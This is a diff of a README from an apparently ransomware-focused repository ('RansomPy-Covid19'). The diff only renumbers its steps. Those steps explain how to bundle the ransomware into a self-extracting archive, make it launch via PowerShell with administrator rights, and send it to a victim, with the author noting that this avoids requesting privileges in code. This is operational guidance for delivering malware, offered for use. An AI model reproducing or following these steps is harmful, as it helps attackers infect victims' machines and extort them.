T-wcs/RansomPy-Covid19/README.md

 1. Select the folder contains the code and libraries
 2. Rename the folder to "setup"
 3. Right Click and "Add to archive"
-4. Select archive format on "ZIP"
-5. Select "Create SFX Archive"
+4. Select "Create SFX Archive"
-6. In the "Advanced tab" click on "SFX Options"
+5. In the "Advanced tab" click on "SFX Options"
-7. Select "Create in the current folder"
+6. Select "Create in the current folder"
-8. Copy "Powershell Start-Process setup/main.exe -Verb RunAs" in the "Launch after installation" section.
+7. Copy "Powershell Start-Process setup/main.exe -Verb RunAs" in the "Launch after installation" section.
-9. In the "Advanced tab" on "SFX Options" check the box "Request Administrative Rights" (Very important, it allows you to run ransomware as an administrator)
+8. In the "Advanced tab" on "SFX Options" check the box "Request Administrative Rights" (Very important, it allows you to run ransomware as an administrator)
-10. Click OK
+9. Click OK
-11. Send the "SFX Archive" to the victim.
+10. Send the "SFX Archive" to the victim.

 The advantage of this method of building an archive is that I do not need to request privileges in the code and it also makes it possible to contain all the libraries in a single executable file.